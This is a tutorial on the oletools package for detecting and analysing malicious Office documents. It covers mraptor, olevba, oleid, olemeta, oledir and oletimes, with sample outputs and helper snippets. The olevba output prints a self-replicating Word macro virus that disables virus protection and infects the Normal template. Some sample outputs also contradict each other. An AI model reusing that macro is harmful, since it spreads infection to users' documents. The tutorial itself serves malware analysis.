Preface
After learning the oletools Python package, you can perform basic analysis of malicious document samples.
What is oletools
oletools is a package of Python tools for analyzing MS OLE2 files (Structured Storage, Compound File Binary Format) and MS Office documents, for malware analysis, forensics and debugging.
Download and install
- Linux, Mac: sudo -H pip install -U oletools
- Windows: pip install -U oletools
Project page on PyPI: https://pypi.org/project/oletools/
Tool modules
Tools for analyzing malicious sample files
- oleid: analyzes OLE files to detect specific characteristics commonly found in malicious files.
- olevba: extracts and analyzes VBA macro source code from MS Office documents (OLE and OpenXML).
- MacroRaptor (mraptor): detects malicious VBA macros.
- msodde: detects and extracts DDE/DDEAUTO links from MS Office documents, RTF and CSV files.
- pyxswf: detects, extracts and analyzes Flash objects (SWF) that may be embedded in MS Office documents (e.g. Word, Excel) and RTF files, which is particularly useful for malware analysis.
- oleobj: extracts embedded objects from OLE files.
- rtfobj: extracts embedded objects from RTF files.
Tools for analyzing OLE file structure
- olebrowse: a simple GUI for browsing OLE files (e.g. MS Word, Excel, PowerPoint documents) to view and extract individual data streams.
- olemeta: extracts all standard properties (metadata) from OLE files.
- oletimes: extracts the creation and modification timestamps of all streams and storages.
- oledir: displays all directory entries of an OLE file, including free and orphaned entries.
- olemap: displays a map of all sectors in an OLE file.
Application examples
- Determine whether the sample contains suspicious macros (macro viruses)
python mraptor.py file.docx
Output content:
MacroRaptor 0.51 - http://decalage.info/python/oletools
This is work in progress, please report issues at https://github.com/decalage2/oletools/issues
----------+-----+----+--------------------------------------------------------
Result    |Flags|Type|File
----------+-----+----+--------------------------------------------------------
Macro OK  |---  |TXT |log.docx

Flags: A=AutoExec, W=Write, X=Execute
Exit code: 2 - Macro OK
mraptor detects most malicious VBA macros with generic heuristics rather than the signatures used by anti-virus engines. A macro is judged malicious when it has an auto-execution trigger (A) and also either writes to the file system or memory (W) or executes a file or payload outside the VBA context (X).
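The decision rule can be sketched in a few lines of Python. This is a simplified illustration, not mraptor's actual implementation: the helper names `parse_flags` and `is_suspicious` are made up for this example, and the input is assumed to be a flag string in the style of the Flags column shown above (for example `AWX` or `---`).

```python
def parse_flags(flags: str) -> dict:
    """Turn a mraptor-style flag string such as 'A-X' into booleans."""
    return {
        "autoexec": "A" in flags,  # auto-execution trigger
        "write": "W" in flags,     # writes to the file system or memory
        "execute": "X" in flags,   # executes something outside the VBA context
    }


def is_suspicious(flags: str) -> bool:
    """Apply the rule: AutoExec AND (Write OR Execute)."""
    f = parse_flags(flags)
    return f["autoexec"] and (f["write"] or f["execute"])


if __name__ == "__main__":
    # Hypothetical flag strings, used only to exercise the rule.
    for flags in ("---", "A--", "-WX", "AW-", "A-X", "AWX"):
        verdict = "SUSPICIOUS" if is_suspicious(flags) else "not flagged"
        print(flags, verdict)
```

Note that a macro that only writes or executes, without an auto-execution trigger, is not flagged by this rule. When working with the library directly, the `MacroRaptor` class in `oletools.mraptor` should expose the same verdict through its `scan()` method and `suspicious` attribute.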
- Get the creation and modification times of all streams and storages in the sample
python oletimes.py file.doc
Output content:
FILE: file.doc
+----------------------------+---------------------+---------------+
| Stream/Storage name        | Modification Time   | Creation Time |
+----------------------------+---------------------+---------------+
| Root                       | 2017-01-04 02:04:53 | None          |
| '\x01CompObj'              | None                | None          |
| '\x05DocumentSummaryInform | None                | None          |
| ation'                     |                     |               |
| '\x05SummaryInformation'   | None                | None          |
| '1Table'                   | None                | None          |
| 'Data'                     | None                | None          |
| 'WordDocument'             | None                | None          |
+----------------------------+---------------------+---------------+
The timestamps reported by oletimes help establish the order in which files were created and how they relate to each other, which is useful when processing a large number of document samples.
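As a rough sketch of that ordering step, the snippet below sorts samples by the modification time of their Root entry. The file names `a.doc` and `b.doc` and their timestamps are hypothetical. In practice the values would come from the oletimes output, or, assuming the olefile library that oletools builds on, from something like `olefile.OleFileIO(path).root.getmtime()`.

```python
from datetime import datetime
from typing import List, Optional, Tuple

# (file name, Root modification time or None when the field is empty)
Record = Tuple[str, Optional[datetime]]


def sort_by_mtime(records: List[Record]) -> List[Record]:
    """Order samples by modification time; samples without one go last."""
    return sorted(records, key=lambda r: (r[1] is None, r[1] or datetime.min))


if __name__ == "__main__":
    samples = [
        ("b.doc", None),                               # hypothetical sample
        ("file.doc", datetime(2017, 1, 4, 2, 4, 53)),  # from the output above
        ("a.doc", datetime(2016, 7, 27, 23, 49, 0)),   # hypothetical sample
    ]
    for name, mtime in sort_by_mtime(samples):
        print(name, mtime)
```

Timestamps stored in a document can be absent or forged, so an ordering like this is a hint rather than proof.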
- View the directory entries (stream structure) of the document
python oledir.py file.doc
Output content:
OLE directory entries in file file.doc:
----+------+-------+----------------------+-----+-----+-----+--------+------
id  |Status|Type   |Name                  |Left |Right|Child|1st Sect|Size
----+------+-------+----------------------+-----+-----+-----+--------+------
0   |<Used>|Root   |Root Entry            |-    |-    |3    |68      |128
1   |<Used>|Stream |Data                  |-    |-    |-    |15      |4096
2   |<Used>|Stream |1Table                |1    |6    |-    |1D      |27856
3   |<Used>|Stream |WordDocument          |2    |5    |-    |0       |10290
4   |<Used>|Stream |\x05SummaryInformation|-    |-    |-    |54      |4096
5   |<Used>|Stream |\x05DocumentSummaryInf|4    |-    |-    |5C      |4096
    |      |       |ormation              |     |     |     |        |
6   |<Used>|Stream |\x01CompObj           |-    |-    |-    |0       |110
7   |unused|Empty  |                      |-    |-    |-    |0       |0
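The "1st Sect" column is printed in hexadecimal. As a small worked example, the sketch below converts such a value into a byte offset in the file. It assumes 512-byte sectors (the usual size for version 3 OLE files) and a stream stored in regular sectors. Streams below the mini-stream cutoff (4096 bytes by default), such as \x01CompObj above, live in the mini stream instead, so this formula does not apply to them. The function name `sector_offset` is made up for this example.

```python
def sector_offset(first_sect_hex: str, sector_size: int = 512) -> int:
    """Return the byte offset of a regular sector given its hex index.

    The header occupies the first sector-sized block of the file,
    so sector 0 starts at offset sector_size.
    """
    sector_index = int(first_sect_hex, 16)
    return (sector_index + 1) * sector_size


if __name__ == "__main__":
    # Values taken from the oledir listing above.
    print("1Table starts at byte", sector_offset("1D"))
    print("WordDocument starts at byte", sector_offset("0"))
```

Under these assumptions, the 1Table stream (first sector 1D) starts at byte (29 + 1) * 512 = 15360, which can be checked with a hex editor.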
- Extract the standard properties (metadata) of the document
python olemeta.py file.doc
Output content:
FILE: file.doc

Properties from the SummaryInformation stream:
+---------------------+------------------------------+
|Property             |Value                         |
+---------------------+------------------------------+
|codepage             |936                           |
|title                |                              |
|subject              |                              |
|author               |TIPDM                         |
|keywords             |                              |
|template             |Normal.dotm                   |
|last_saved_by        |User                          |
|revision_number      |6                             |
|total_edit_time      |1740                          |
|last_printed         |2016-06-27 05:49:00           |
|create_time          |2016-07-27 23:49:00           |
|last_saved_time      |2017-01-04 02:04:00           |
|num_pages            |1                             |
|num_words            |87                            |
|num_chars            |498                           |
|creating_application |Microsoft Office Word         |
|security             |0                             |
+---------------------+------------------------------+

Properties from the DocumentSummaryInformation stream:
+---------------------+------------------------------+
|Property             |Value                         |
+---------------------+------------------------------+
|codepage_doc         |936                           |
|lines                |4                             |
|paragraphs           |1                             |
|scale_crop           |False                         |
|company              |                              |
|links_dirty          |False                         |
|chars_with_spaces    |584                           |
|shared_doc           |False                         |
|hlinks_changed       |False                         |
|version              |917504                        |
+---------------------+------------------------------+
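Some of these values need decoding before they are useful. As a small worked example, the sketch below splits the `version` property into a major and a minor number, assuming the common layout in which the major version is stored in the high 16 bits and the minor version in the low 16 bits. The function name `decode_app_version` is made up for this example.

```python
from typing import Tuple


def decode_app_version(version: int) -> Tuple[int, int]:
    """Split a 32-bit version property into (major, minor).

    Assumes: high 16 bits = major version, low 16 bits = minor version.
    """
    major = (version >> 16) & 0xFFFF
    minor = version & 0xFFFF
    return major, minor


if __name__ == "__main__":
    major, minor = decode_app_version(917504)  # value from the output above
    print(f"application version {major}.{minor}")
```

Under that assumption, 917504 = 14 * 65536, i.e. version 14.0, which would correspond to Office 2010.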
- Extract the macro code of the document
python olevba.py file.doc
Output content:
Flags       Filename
----------- -----------------------------------------------------------------
OLE:MAS--B-- file.doc
===============================================================================
FILE: file.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: file.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
'APMP
'KILL
Private Sub Document_Open()
    On Error Resume Next
    Application.DisplayStatusBar = False
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
    MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 20)
    Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule
    If ThisDocument = NormalTemplate Then _
        Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
    With Host
        If .Lines(1, 1) = "APMP" & .Lines(1, 2) <> "KILL" Then
            .DeleteLines 1, .CountOfLines
            .InsertLines 1, MyCode
            If ThisDocument = NormalTemplate Then _
                ActiveDocument.SaveAs ActiveDocument.FullName
        End If
    End With
End Sub
+------------+----------------+-----------------------------------------+
| Type       | Keyword        | Description                             |
+------------+----------------+-----------------------------------------+
| AutoExec   | Document_Open  | Runs when the Word or Publisher         |
|            |                | document is opened                      |
| Suspicious | KILL           | May delete a file                       |
| Suspicious | VBProject      | May attempt to modify the VBA code      |
|            |                | (self-modification)                     |
| Suspicious | VBComponents   | May attempt to modify the VBA code      |
|            |                | (self-modification)                     |
| Suspicious | CodeModule     | May attempt to modify the VBA code      |
|            |                | (self-modification)                     |
| Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
|            |                | may be used to obfuscate strings        |
|            |                | (option --decode to see all)            |
+------------+----------------+-----------------------------------------+
olevba parses OLE and OpenXML files to detect VBA macros and extract their source code. It flags suspicious macros by looking for auto-executable macros, suspicious VBA keywords, keywords used by anti-sandboxing and anti-virtualization techniques, and potential IOCs (IP addresses, URLs, executable file names, etc.). It can also detect and decode several common obfuscation methods, including hex encoding, reversed strings, Base64, Dridex and VBA expressions, and extract IOCs from the decoded strings.
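To give a feel for what decoding these obfuscation methods involves, here is a minimal sketch using only the Python standard library. It is not olevba's implementation: the helper names are made up for this example, and it covers only hex, Base64 and reversed strings (Dridex and VBA expressions are left out).

```python
import base64
import binascii
import re
from typing import Optional


def decode_hex(s: str) -> Optional[str]:
    """Decode a hex-encoded string, or return None if it is not valid hex."""
    if len(s) % 2 or not re.fullmatch(r"[0-9A-Fa-f]+", s):
        return None
    return bytes.fromhex(s).decode("latin-1")


def decode_base64(s: str) -> Optional[str]:
    """Decode a Base64 string, or return None if it is not valid Base64."""
    try:
        return base64.b64decode(s, validate=True).decode("latin-1")
    except (binascii.Error, ValueError):
        return None


def decode_reversed(s: str) -> str:
    """Undo a StrReverse-style obfuscation."""
    return s[::-1]


if __name__ == "__main__":
    # Hypothetical obfuscated strings, all hiding the same file name.
    print(decode_hex("636d642e657865"))
    print(decode_base64("Y21kLmV4ZQ=="))
    print(decode_reversed("exe.dmc"))
```

A real analyzer would then search the decoded strings for IOCs such as URLs or executable names. For scripted use of olevba itself, the `VBA_Parser` class in `oletools.olevba` should provide `extract_macros()` and `analyze_macros()` for this purpose.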
- Detect specific characteristics of documents
python oleid.py file.doc
Output content:
Filename: file.doc
+-------------------------------+-----------------------+
| Indicator                     | Value                 |
+-------------------------------+-----------------------+
| OLE format                    | True                  |
| Has SummaryInformation stream | True                  |
| Application name              | Microsoft Office Word |
| Encrypted                     | False                 |
| Word Document                 | True                  |
| VBA Macros                    | False                 |
| Excel Workbook                | False                 |
| PowerPoint Presentation       | False                 |
| Visio Drawing                 | False                 |
| ObjectPool                    | False                 |
| Flash objects                 | 0                     |
+-------------------------------+-----------------------+
oleid detects the OLE file type (MS Word, Excel, PowerPoint, etc.), VBA macros, embedded Flash objects, embedded OLE objects (ObjectPool), and MS Office encryption in a suspicious document.
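The first indicator, "OLE format", boils down to checking the file signature. The sketch below shows one way to do that check by hand, using the 8-byte magic number that starts every OLE2 compound file. It is only an illustration of the idea, not oleid's code, and the function names are made up for this example.

```python
# Signature found in the first 8 bytes of every OLE2 compound file.
OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")


def has_ole_magic(data: bytes) -> bool:
    """Return True if the buffer starts with the OLE2 signature."""
    return data[:8] == OLE_MAGIC


def looks_like_ole(path: str) -> bool:
    """Read the first 8 bytes of a file and check the OLE2 signature."""
    with open(path, "rb") as f:
        return has_ole_magic(f.read(8))


if __name__ == "__main__":
    import sys

    for name in sys.argv[1:]:
        print(name, looks_like_ole(name))
```

Files such as .docx are ZIP archives rather than OLE files, so this check returns False for them even though they may still contain macros.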
Summary
The next time you encounter a suspicious document sample (such as an attachment in an anonymous email, a file uploaded to a QQ chat group, or a document shared through a cloud drive), you can use the methods above for basic detection and analysis.